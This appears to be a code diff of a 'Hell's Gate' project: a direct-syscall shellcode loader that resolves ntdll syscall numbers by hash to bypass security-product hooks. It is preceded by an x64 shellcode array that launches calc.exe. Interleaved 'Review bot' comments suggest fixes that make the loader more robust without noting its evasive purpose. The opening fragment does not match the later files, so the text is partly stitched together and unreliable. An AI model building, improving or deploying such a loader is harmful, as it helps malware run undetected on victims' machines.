"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
|
||||
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
|
||||
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
|
||||
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
|
||||
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
|
||||
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
|
||||
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
|
||||
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
|
||||
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
|
||||
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
|
||||
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
|
||||
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
|
||||
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
|
||||
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
|
||||
"\x63\x2e\x65\x78\x65\x00";
|
||||
|
||||
DWORD ShellcodeLength = sizeof(Shellcode);
|
||||
|
||||
extern BOOL HellsGate(void);
|
||||
|
||||
INT wmain() {
|
||||
|
||||
BOOL a = HellsGate();
|
||||
|
||||
}
|
|
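Review bot: `DWORD ShellcodeLength = sizeof(Shellcode);` is a 4-byte object, but HELLSGATE.ASM imports it as `extern ShellcodeLength: QWORD` and reads it with 64-bit loads (`mov r10, ShellcodeLength` for the allocation size and `mov rcx, ShellcodeLength` as the `rep movsb` count), so the upper half of both values is whatever the linker happened to place after the variable. Changing the definition to `SIZE_T ShellcodeLength = sizeof(Shellcode);` makes the two sides agree. `wmain` also discards the result and falls off the end; `return a ? 0 : 1;` would make a failed resolution visible to whoever runs it. The payload appears to be the usual x64 `WinExec("calc.exe")` stub (the string `calc.exe` is visible in its last bytes), so a one-line comment such as `/* x64 calc.exe launcher used as a test payload; replace as needed */` would tell readers what executes.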
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.30114.105
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,161 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
|
||||
<RootNamespace>HellsGate</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="main.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="structs.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<MASM Include="hellsgate.asm">
|
||||
<FileType>Document</FileType>
|
||||
</MASM>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||
</ImportGroup>
|
||||
</Project>
|
|
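Review bot: The project keeps `Debug|Win32` and `Release|Win32` configurations while `hellsgate.asm` is 64-bit-only code (`r8`–`r15`, `gs:[60h]`, `syscall`), so the x86 configurations cannot assemble; either drop the Win32 entries from the project and solution or exclude the MASM item for them with `<ExcludedFromBuild Condition="'$(Platform)'=='Win32'">true</ExcludedFromBuild>`. The item list also references `structs.h`, which does not appear among the files added in this commit as far as the visible sections show — presumably it exists elsewhere in the tree, but that is worth confirming before the project is built from a clean checkout.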
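--- /dev/null
+++ b/PLACEHOLDER_PATH_NOT_ON_PAGE.vcxproj.filters
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup>
+<Filter Include="Source Files">
+<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+</Filter>
+<Filter Include="Header Files">
+<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+</Filter>
+<Filter Include="Resource Files">
+<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+</Filter>
+</ItemGroup>
+<ItemGroup>
+<ClCompile Include="main.c">
+<Filter>Source Files</Filter>
+</ClCompile>
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="structs.h">
+<Filter>Header Files</Filter>
+</ClInclude>
+</ItemGroup>
+<ItemGroup>
+<MASM Include="hellsgate.asm">
+<Filter>Source Files</Filter>
+</MASM>
+</ItemGroup>
+</Project>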
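--- /dev/null
+++ b/hellsgate.asm
@@ -0,0 +1,23 @@
+; Hell's Gate
+; Dynamic system call invocation
+;
+; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
+
+.data
+wSystemCall DWORD 000h
+
+.code
+HellsGate PROC
+mov wSystemCall, 000h
+mov wSystemCall, ecx
+ret
+HellsGate ENDP
+
+HellDescent PROC
+mov r10, rcx
+mov eax, wSystemCall
+
+syscall
+ret
+HellDescent ENDP
+end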
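Review bot: `HellsGate` stores the whole of `ecx` into the DWORD `wSystemCall` (`mov wSystemCall, ecx`), but the C side declares the argument as a `WORD`, and the Microsoft x64 ABI does not require the caller to zero the upper bits of a register holding a 16-bit argument, so `HellDescent`'s `mov eax, wSystemCall` can carry garbage in bits 16–31; zero-extend explicitly with `movzx eax, cx` followed by `mov wSystemCall, eax`. The preceding `mov wSystemCall, 000h` is dead, as it is overwritten by the very next instruction. The two procedures communicate only through that `.data` global, so a `HellsGate`/`HellDescent` pair is not safe against another thread calling `HellsGate` in between; a header comment naming the ABI (Microsoft x64), the required call order, the input register of each procedure and the fact that the shared global is not thread-safe would make the contract visible to the C caller.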
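--- /dev/null
+++ b/main.c
@@ -0,0 +1,211 @@
+#pragma once
+#include <Windows.h>
+#include "structs.h"
+
+/*--------------------------------------------------------------------
+VX Tables
+--------------------------------------------------------------------*/
+typedef struct _VX_TABLE_ENTRY {
+PVOID pAddress;
+DWORD64 dwHash;
+WORD wSystemCall;
+} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
+
+typedef struct _VX_TABLE {
+VX_TABLE_ENTRY NtAllocateVirtualMemory;
+VX_TABLE_ENTRY NtProtectVirtualMemory;
+VX_TABLE_ENTRY NtCreateThreadEx;
+VX_TABLE_ENTRY NtWaitForSingleObject;
+} VX_TABLE, * PVX_TABLE;
+
+/*--------------------------------------------------------------------
+Function prototypes.
+--------------------------------------------------------------------*/
+PTEB RtlGetThreadEnvironmentBlock();
+BOOL GetImageExportDirectory(
+_In_ PVOID pModuleBase,
+_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
+);
+BOOL GetVxTableEntry(
+_In_ PVOID pModuleBase,
+_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
+_In_ PVX_TABLE_ENTRY pVxTableEntry
+);
+BOOL Payload(
+_In_ PVX_TABLE pVxTable
+);
+PVOID VxMoveMemory(
+_Inout_ PVOID dest,
+_In_ const PVOID src,
+_In_ SIZE_T len
+);
+
+/*--------------------------------------------------------------------
+External functions' prototype.
+--------------------------------------------------------------------*/
+extern VOID HellsGate(WORD wSystemCall);
+extern HellDescent();
+
+INT wmain() {
+PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
+PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
+if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
+return 0x1;
+
+// Get NTDLL module
+PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+// Get the EAT of NTDLL
+PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
+if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
+return 0x01;
+
+VX_TABLE Table = { 0 };
+Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
+return 0x1;
+
+Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
+return 0x1;
+
+Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
+return 0x1;
+
+Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
+if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
+return 0x1;
+
+Payload(&Table);
+return 0x00;
+}
+
+PTEB RtlGetThreadEnvironmentBlock() {
+#if _WIN64
+return (PTEB)__readgsqword(0x30);
+#else
+return (PTEB)__readfsdword(0x16);
+#endif
+}
+
+DWORD64 djb2(PBYTE str) {
+DWORD64 dwHash = 0x7734773477347734;
+INT c;
+
+while (c = *str++)
+dwHash = ((dwHash << 0x5) + dwHash) + c;
+
+return dwHash;
+}
+
+BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
+// Get DOS header
+PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
+if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
+return FALSE;
+}
+
+// Get NT headers
+PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
+if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
+return FALSE;
+}
+
+// Get the EAT
+*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+return TRUE;
+}
+
+BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
+PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
+PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
+PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
+PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
+PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
+
+if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
+pVxTableEntry->pAddress = pFunctionAddress;
+
+// Quick and dirty fix in case the function has been hooked
+WORD cw = 0;
+while (TRUE) {
+// check if syscall, in this case we are too far
+if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
+return FALSE;
+
+// check if ret, in this case we are also probaly too far
+if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
+return FALSE;
+
+// First opcodes should be :
+// MOV R10, RCX
+// MOV RCX, <syscall>
+if (*((PBYTE)pFunctionAddress + cw) == 0x4c
+&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
+&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
+&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
+&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
+&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
+BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
+BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
+pVxTableEntry->wSystemCall = (high << 8) | low;
+break;
+}
+
+cw++;
+};
+}
+}
+
+return TRUE;
+}
+
+BOOL Payload(PVX_TABLE pVxTable) {
+NTSTATUS status = 0x00000000;
+char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
+
+// Allocate memory for the shellcode
+PVOID lpAddress = NULL;
+SIZE_T sDataSize = sizeof(shellcode);
+HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
+status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
+
+// Write Memory
+VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
+
+// Change page permissions
+ULONG ulOldProtect = 0;
+HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
+status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
+
+// Create thread
+HANDLE hHostThread = INVALID_HANDLE_VALUE;
+HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
+status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
+
+// Wait for 1 seconds
+LARGE_INTEGER Timeout;
+Timeout.QuadPart = -10000000;
+HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
+status = HellDescent(hHostThread, FALSE, &Timeout);
+
+return TRUE;
+}
+
+PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
+char* d = dest;
+const char* s = src;
+if (d < s)
+while (len--)
+*d++ = *s++;
+else {
+char* lasts = s + (len - 1);
+char* lastd = d + (len - 1);
+while (len--)
+*lastd-- = *lasts--;
+}
+return dest;
+}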
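Review bot: `wmain` dereferences `pCurrentTeb->ProcessEnvironmentBlock` one line before it tests `!pCurrentTeb`, so that null check can never fire in time; test first, `if (!pCurrentTeb) return 0x1;`, before reading `ProcessEnvironmentBlock`. `GetVxTableEntry` falls through to `return TRUE;` when no export hash matched, leaving `pAddress` NULL and `wSystemCall` zero for the caller to use, and `Payload` assigns every `HellDescent` result to `status` without ever checking it, so a failed allocation reaches `VxMoveMemory(lpAddress, …)` with a NULL destination; a `return FALSE;` after the loop and a `status < 0` check after each call (`NT_SUCCESS` where that macro is available) close both gaps. `extern HellDescent();` declares neither a return type nor a parameter list (implicit `int`, K&R style), and the 32-bit branch of `RtlGetThreadEnvironmentBlock` reads `fs:[0x16]` although the TEB self-pointer sits at `fs:[0x18]`; both are dead on this x64-only build but should be corrected or removed rather than left as traps. `#pragma once` on the first line of a `.c` file has no effect and looks copied from the header.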
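--- /dev/null
+++ b/structs.h
@@ -0,0 +1,337 @@
+#pragma once
+#include <Windows.h>
+
+/*--------------------------------------------------------------------
+STRUCTURES
+--------------------------------------------------------------------*/
+typedef struct _LSA_UNICODE_STRING {
+USHORT Length;
+USHORT MaximumLength;
+PWSTR Buffer;
+} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
+
+typedef struct _LDR_MODULE {
+LIST_ENTRY InLoadOrderModuleList;
+LIST_ENTRY InMemoryOrderModuleList;
+LIST_ENTRY InInitializationOrderModuleList;
+PVOID BaseAddress;
+PVOID EntryPoint;
+ULONG SizeOfImage;
+UNICODE_STRING FullDllName;
+UNICODE_STRING BaseDllName;
+ULONG Flags;
+SHORT LoadCount;
+SHORT TlsIndex;
+LIST_ENTRY HashTableEntry;
+ULONG TimeDateStamp;
+} LDR_MODULE, * PLDR_MODULE;
+
+typedef struct _PEB_LDR_DATA {
+ULONG Length;
+ULONG Initialized;
+PVOID SsHandle;
+LIST_ENTRY InLoadOrderModuleList;
+LIST_ENTRY InMemoryOrderModuleList;
+LIST_ENTRY InInitializationOrderModuleList;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+typedef struct _PEB {
+BOOLEAN InheritedAddressSpace;
+BOOLEAN ReadImageFileExecOptions;
+BOOLEAN BeingDebugged;
+BOOLEAN Spare;
+HANDLE Mutant;
+PVOID ImageBase;
+PPEB_LDR_DATA LoaderData;
+PVOID ProcessParameters;
+PVOID SubSystemData;
+PVOID ProcessHeap;
+PVOID FastPebLock;
+PVOID FastPebLockRoutine;
+PVOID FastPebUnlockRoutine;
+ULONG EnvironmentUpdateCount;
+PVOID* KernelCallbackTable;
+PVOID EventLogSection;
+PVOID EventLog;
+PVOID FreeList;
+ULONG TlsExpansionCounter;
+PVOID TlsBitmap;
+ULONG TlsBitmapBits[0x2];
+PVOID ReadOnlySharedMemoryBase;
+PVOID ReadOnlySharedMemoryHeap;
+PVOID* ReadOnlyStaticServerData;
+PVOID AnsiCodePageData;
+PVOID OemCodePageData;
+PVOID UnicodeCaseTableData;
+ULONG NumberOfProcessors;
+ULONG NtGlobalFlag;
+BYTE Spare2[0x4];
+LARGE_INTEGER CriticalSectionTimeout;
+ULONG HeapSegmentReserve;
+ULONG HeapSegmentCommit;
+ULONG HeapDeCommitTotalFreeThreshold;
+ULONG HeapDeCommitFreeBlockThreshold;
+ULONG NumberOfHeaps;
+ULONG MaximumNumberOfHeaps;
+PVOID** ProcessHeaps;
+PVOID GdiSharedHandleTable;
+PVOID ProcessStarterHelper;
+PVOID GdiDCAttributeList;
+PVOID LoaderLock;
+ULONG OSMajorVersion;
+ULONG OSMinorVersion;
+ULONG OSBuildNumber;
+ULONG OSPlatformId;
+ULONG ImageSubSystem;
+ULONG ImageSubSystemMajorVersion;
+ULONG ImageSubSystemMinorVersion;
+ULONG GdiHandleBuffer[0x22];
+ULONG PostProcessInitRoutine;
+ULONG TlsExpansionBitmap;
+BYTE TlsExpansionBitmapBits[0x80];
+ULONG SessionId;
+} PEB, * PPEB;
+
+typedef struct __CLIENT_ID {
+HANDLE UniqueProcess;
+HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+ULONG Flags;
+PCHAR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME {
+ULONG Flags;
+struct _TEB_ACTIVE_FRAME* Previous;
+PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
+
+typedef struct _GDI_TEB_BATCH {
+ULONG Offset;
+ULONG HDC;
+ULONG Buffer[310];
+} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
+
+typedef PVOID PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
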